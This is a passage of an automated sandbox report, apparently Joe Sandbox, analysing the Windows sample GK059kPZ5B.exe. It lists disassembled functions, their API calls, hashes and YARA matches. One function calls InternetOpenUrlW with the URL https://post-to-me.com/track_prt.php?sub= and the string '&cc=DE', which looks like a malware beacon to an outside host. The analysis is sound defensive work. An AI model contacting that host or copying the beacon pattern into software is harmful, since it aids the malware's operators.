                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                            • String ID:
                                                            • API String ID: 3281396844-0
                                                            • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                            • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                            • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                            • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                            Function 00402054 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                            • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                            • String ID:
                                                            • API String ID: 2357751836-0
                                                            • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                            • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                            • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                            • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                            Function 00A550EB Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A550C8
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A550DC
                                                              • Part of subcall function 00A5BDD3: __EH_prolog3_GS.LIBCMT ref: 00A5BDDA
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A55141
                                                            • __Getcoll.LIBCPMT ref: 00A55150
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A55160
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                            • String ID:
                                                            • API String ID: 1844465188-0
                                                            • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                            • Instruction ID: c266b5f71edd4b5e0d354e7941db270e5655c2abb3014ee41eaeb70b0be30d78
                                                            • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                            • Instruction Fuzzy Hash: C12192B1C14714EFDB00EFA0D551BDDBBB0FF44762F508519E845AB182DB749A88CB91
                                                            Function 00431F7E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                            • _free.LIBCMT ref: 00431FB8
                                                            • _free.LIBCMT ref: 00431FDF
                                                            • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                            • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                            • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                            • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                            • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                            Function 00A821E5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00A5DAFC,00A5DAFC,00000002,00A7ED55,00A83971,00000000,?,00A76A25,00000002,00000000,00000000,00000000,?,00A5CFAD,00A5DAFC,00000004), ref: 00A821EA
                                                            • _free.LIBCMT ref: 00A8221F
                                                            • _free.LIBCMT ref: 00A82246
                                                            • SetLastError.KERNEL32(00000000,?,00A5DAFC), ref: 00A82253
                                                            • SetLastError.KERNEL32(00000000,?,00A5DAFC), ref: 00A8225C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                            • Instruction ID: fa68021a2c94f24fdd98c3393063a9696cdb60899bad8275a93334bafaebbbc4
                                                            • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                            • Instruction Fuzzy Hash: EA01F976505B0037C21237345D86FBB266DEFD2BB2B200539F915922D2FE608D028325
                                                            Function 00431EFA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                            • _free.LIBCMT ref: 00431F31
                                                            • _free.LIBCMT ref: 00431F59
                                                            • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                            • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                            • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                            • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                            Function 00A82161 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                            • _free.LIBCMT ref: 00A82198
                                                            • _free.LIBCMT ref: 00A821C0
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                            • Instruction ID: f31913fe3a8bc4f5c4bc6a607da3b3ca09b20d7a6e6ed606bc06b1939cf61060
                                                            • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                            • Instruction Fuzzy Hash: 8DF0C836544B0177D6113738AD0EB3F26699FC2FA2F350624FE18D22D2FE618D524369
                                                            Function 00417940 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                              • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                              • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                              • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                              • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                            • String ID:
                                                            • API String ID: 4266703842-0
                                                            • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                            • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                            Function 00A67BA7 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A629C4: TlsGetValue.KERNEL32(?,?,00A60DE2,00A62EEF,00000000,?,00A60DC0,?,?,?,00000000,?,00000000), ref: 00A629CA
                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00A67BD1
                                                              • Part of subcall function 00A7123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A71261
                                                              • Part of subcall function 00A7123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A7127A
                                                              • Part of subcall function 00A7123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A712F0
                                                              • Part of subcall function 00A7123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A712F8
                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00A67BDF
                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00A67BE9
                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00A67BF3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A67C11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                            • String ID:
                                                            • API String ID: 4266703842-0
                                                            • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction ID: cea7367fb2e444ad1418b30be93aa89d15389e4df95a3c595e13edd8a129afa8
                                                            • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction Fuzzy Hash: A8F08B31A0011867CF15F374D9129AEB73ACF80B14B00812AF41297282EF368E458BC1
                                                            Function 00439E65 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00439E7D
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 00439E8F
                                                            • _free.LIBCMT ref: 00439EA1
                                                            • _free.LIBCMT ref: 00439EB3
                                                            • _free.LIBCMT ref: 00439EC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                            Function 00A8A0CC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00A8A0E4
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8A0F6
                                                            • _free.LIBCMT ref: 00A8A108
                                                            • _free.LIBCMT ref: 00A8A11A
                                                            • _free.LIBCMT ref: 00A8A12C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction ID: b9ee35ee30a54116f080375be6d6c3d2e3fbeece79fd662a5b1b8495bb08554f
                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction Fuzzy Hash: 20F04F33505200AB9A20FB5CE9C7C0A73E9AA10B91F640E16F008D7751DF35FC908B5A
                                                            Function 0043174A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00431768
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 0043177A
                                                            • _free.LIBCMT ref: 0043178D
                                                            • _free.LIBCMT ref: 0043179E
                                                            • _free.LIBCMT ref: 004317AF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                            Function 0041CCE5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                            • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                            • String ID:
                                                            • API String ID: 2583373041-0
                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                            Function 00A819B1 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00A819CF
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A819E1
                                                            • _free.LIBCMT ref: 00A819F4
                                                            • _free.LIBCMT ref: 00A81A05
                                                            • _free.LIBCMT ref: 00A81A16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction ID: 3b596edfd4d43bbc1703859903431802406575f520873067e0f8b98415b19621
                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction Fuzzy Hash: CAF03071C00311AB8E217F18AD824093F64AF19B627000A76F40297373DB74D963DB8E
                                                            Function 00A6CF4C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 00A6CF56
                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 00A6CF87
                                                            • GetCurrentThread.KERNEL32 ref: 00A6CF90
                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 00A6CFA3
                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 00A6CFAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                            • String ID:
                                                            • API String ID: 2583373041-0
                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction ID: 1a1940b453d985e9d536e72978bd075b6d8c2b500c0eb80809e733fe9241fe4d
                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction Fuzzy Hash: C0F0A033300A009BCA25EF21FA508BB77B6AFC4720300454CF4870B652CF22E902DB71
                                                            Function 00A52E8B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00A52EAE
                                                              • Part of subcall function 00A51321: _wcslen.LIBCMT ref: 00A51328
                                                              • Part of subcall function 00A51321: _wcslen.LIBCMT ref: 00A51344
                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00A530C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InternetOpen_wcslen
                                                            • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                            • API String ID: 3381584094-4083784958
                                                            • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                            • Instruction ID: ec99dba18f463ff9f93e46ea941d415f9bb699ba4462fac46a7023415d59b2d5
                                                            • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                            • Instruction Fuzzy Hash: 02517295A65344A8E320EFB0BC52B353378FF58752F10643BE518CB2B2E7B19A44875E
                                                            Function 0042F738 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GK059kPZ5B.exe,00000104), ref: 0042F773
                                                            • _free.LIBCMT ref: 0042F83E
                                                            • _free.LIBCMT ref: 0042F848
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\GK059kPZ5B.exe
                                                            • API String ID: 2506810119-3024341650
                                                            • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                            • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                            • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                            • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                            Function 00A7F99F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GK059kPZ5B.exe,00000104), ref: 00A7F9DA
                                                            • _free.LIBCMT ref: 00A7FAA5
                                                            • _free.LIBCMT ref: 00A7FAAF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\GK059kPZ5B.exe
                                                            • API String ID: 2506810119-3024341650
                                                            • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                            • Instruction ID: f933a39f757d862190d0a7091f3508588c0b564afbb4c539439e52a05390445d
                                                            • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                            • Instruction Fuzzy Hash: 1B317C71A04218AFDB21DB999D8199EBBFCEF99750B10C0B6F90C97211D6709F40CB95
                                                            Function 00A73044 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A73071
                                                              • Part of subcall function 00A68AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00A68ADD
                                                            • SafeSQueue.LIBCONCRT ref: 00A7308A
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A7314A
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7316B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A73179
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 3496964030-1785270423
                                                            • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                            • Instruction ID: 9de9d4b8eba0e23d2e3b0754b0f256976e8a92e81af7b9f7dbfe2d0afb6db97a
                                                            • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                            • Instruction Fuzzy Hash: 2521C2367006019FCF15AF68CD90AA97BB1AF84310F1AC299ED5A8B356CB70ED05DB91
                                                            Function 00A79053 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00A821E4), ref: 00A7E220
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00A821E4), ref: 00A7E25A
